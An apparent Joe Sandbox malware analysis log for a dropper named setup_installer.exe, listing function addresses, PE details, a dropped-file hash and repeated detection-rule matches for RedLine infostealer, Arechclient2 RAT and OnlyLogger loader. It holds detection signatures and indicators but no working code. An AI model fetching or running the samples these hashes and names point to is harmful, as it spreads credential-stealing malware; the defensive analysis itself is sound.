                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5E256019_2_00007FF72F5E2560
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5F356019_2_00007FF72F5F3560
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5F655019_2_00007FF72F5F6550
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F65261019_2_00007FF72F652610
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5E761019_2_00007FF72F5E7610
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6A85E419_2_00007FF72F6A85E4
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F60246019_2_00007FF72F602460
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6534C019_2_00007FF72F6534C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5E84A019_2_00007FF72F5E84A0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F60F4B019_2_00007FF72F60F4B0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F64D39019_2_00007FF72F64D390
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F63F38019_2_00007FF72F63F380
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F65636019_2_00007FF72F656360
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F61E35019_2_00007FF72F61E350
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F63032019_2_00007FF72F630320
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F6A63DC19_2_00007FF72F6A63DC
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F64C3F019_2_00007FF72F64C3F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: 19_2_00007FF72F5E43C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: 19_2_00007FF72F5FF3B0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: 19_2_00007FF72F5F33B0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: 19_2_00007FF72F5FA2E0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: 19_2_00007FF72F6232C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: 19_2_00007FF72F6152C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: 19_2_00007FF72F654150
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: 19_2_00007FF72F5F9210
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: 19_2_00007FF72F5EC1C0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: 19_2_00007FF72F64A1B0
                  Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\09xU.exE B45C9DE845522095BBFA55166B519B2BE36A08CEA688491B9F339E862E79C3BA
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: String function: 00007FF72F5E2470 appears 42 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: String function: 00007FF72F5E4A00 appears 139 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: String function: 00007FF72F5C8550 appears 99 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: String function: 00007FF72F5C8890 appears 58 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe | Code function: String function: 00007FF72F5C82C0 appears 92 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: String function: 00496E20 appears 45 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: String function: 00496AA0 appears 44 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: String function: 00482860 appears 136 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Code function: String function: 00496CB0 appears 43 times
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Code function: String function: 00403204 appears 37 times
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exe | Code function: String function: 00418D80 appears 122 times
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 980
                  Source: Mon17b5f403be4d8d6b.exe.1.dr | Static PE information: Resource name: DLL type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                  Source: libstdc++-6.dll.1.dr | Static PE information: Number of sections : 12 > 10
                  Source: setup_install.exe.1.dr | Static PE information: Number of sections : 16 > 10
                  Source: libcurl.dll.1.dr | Static PE information: Number of sections : 19 > 10
                  Source: libcurlpp.dll.1.dr | Static PE information: Number of sections : 18 > 10
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe, 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename7zS.sfx.exe, vs abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe, 00000000.00000002.1685110021.00000000006CE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename7zS.sfx.exe, vs abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe
                  Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.5c50000.8.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 22.0.Mon178817e243.exe.e60000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.3.Mon179e1058f256.exe.18a9250.1.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.352d6c6.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.5c50ee8.7.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 26.2.Mon1785436ae78.exe.17e0e50.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 26.3.Mon1785436ae78.exe.1880000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 26.3.Mon1785436ae78.exe.1880000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.47f3790.6.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_3d9371fd reference_sample = 0ec522dfd9307772bf8b600a8b91fd6facd0bf4090c2b386afd20e955b25206a, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 2d7ff7894b267ba37a2d376b022bae45c4948ef3a70b1af986e7492949b5ae23, id = 3d9371fd-c094-40fc-baf8-f0e9e9a54ff9, last_modified = 2022-04-12
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 1.3.setup_installer.exe.30bf192.11.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                  Source: 2.2.setup_install.exe.6b280000.2.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector03 author = ditekSHen, description = Detects unknown loader / injector
                  Source: 1.3.setup_installer.exe.2f30000.8.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector03 author = ditekSHen, description = Detects unknown loader / injector
                  Source: 29.2.Mon179e1058f256.exe.17f0e50.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.3.Mon179e1058f256.exe.3140000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 1.3.setup_installer.exe.2f66740.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_DLInjector03 author = ditekSHen, description = Detects unknown loader / injector
                  Source: 26.2.Mon1785436ae78.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_OnlyLogger author = ditekSHen, description = Detects OnlyLogger loader variants
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.352c7de.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.47d6458.5.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 29.2.Mon179e1058f256.exe.6390000.9.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
